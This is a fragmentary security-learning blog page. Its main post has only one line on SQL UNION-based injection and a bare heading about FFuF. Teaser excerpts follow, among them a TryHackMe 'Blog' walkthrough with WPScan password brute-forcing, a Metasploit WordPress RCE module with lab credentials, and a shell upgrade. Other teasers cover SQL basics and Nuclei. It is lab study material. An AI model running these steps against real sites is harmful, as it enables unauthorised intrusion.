API - Injection Module

 





 







UNION-Based Attack: Union-based attack should be the same no of columns matched with the database. For this purpose, we have to use a NULL statement to complete all the columns.







Using FFuF Tool










Comments

Post a Comment

Popular posts from this blog

SQL Basics | Shahul Hameed

Image
  SQL _Queries   Resource: https://balanced-quince-db1.notion.site/SQL-7347f5956fe347f887b4132c716cd236#17bc403a1add453db519621da47c1de3 Database queries CREATE DATABASE LOGICFIRST; -- creates a new database -- TO DELETE A DATABASE DROP DATABASE LOGICFIRST; DROP SCHEMA LOGICFIRST; -- same as above. u can use DATABASE Or SCHEMA DROP SCHEMA IF EXISTS LOGICFIRST; -- prevents error if db not found   SHOW DATABASES; -- shows all the databases SHOW SCHEMAS; -- same as above. shows schemas/db   USE SYS; -- uses this database for all further commands SHOW TABLES;-- shows all tables in the database being used Table - Create,Delete,Alter primary key - uniquely identifies a row in a table //creating a table CREATE TABLE student(                id INT PRIMARY KEY,     name VARCHAR(30),     gpa DECIMAL(3,2) ); -- ----or----- CREATE ...
Read more

Blog Machine - Try Hack Me

Image
 Step 1: Gather Information: nmap scan           Open Ports, Version, FTP, SMB, RDP  Step 2: Gather Information: Directory Enumeration gobuster dir -u http://10.10.126.45 -w /usr/share/wordlists/dirb/big.txt -s 200,204,301,302,307,308 --status-codes-blacklist "" -t 20 -o blog.th Step 3: WPScan  wpscan --url http://blog.thm/ --enumerate p --enumerate t --enumerate u > wpscan_output.txt cat  Step 4: Brute-force Username & Password Step 5: Password taken from rockyou.txt wpscan --url http://blog.thm/ -P /root/Documents/Wordlists/rockyou.txt -U /root/usr.txt --verbose > UserEnumer.txt Step 6: Metasploitable use exploit/multi/http/wp_crop_rce set rhosts 10.10 . 109 . 33 set username kwheel set password cutiepie1 set LHOST <My_Machine_IP> run shell python -c 'import pty; pty.spawn("/bin/bash")' id Step 7:  Inside "Shell" - Walkthrough folder files access cd /home ls cd bjoel ls cat user. txt download /home/bjoel/Billy_Joe...
Read more

Pentest - Web Application Vulnerability Scanner | Shahul Hameed

Image
 W eb Application Vulnerability Scanner  Tool Name:  NUCLEI   Description      Nuclei are used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offer to scan for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless, etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.           Nuclei are a fast, template-based vulnerability scanner focusing on extensive configurability , massive extensibility, and ease of use. Installation & Demonstration Usage:      CMD : nuclei -h Step 1:      Download and install before use nuclei Go lang in kali linux      CMD : sudo apt-get update & sudo apt-get upgrade      CMD: sudo apt-get install -y golang Step 2:      Download and in...
Read more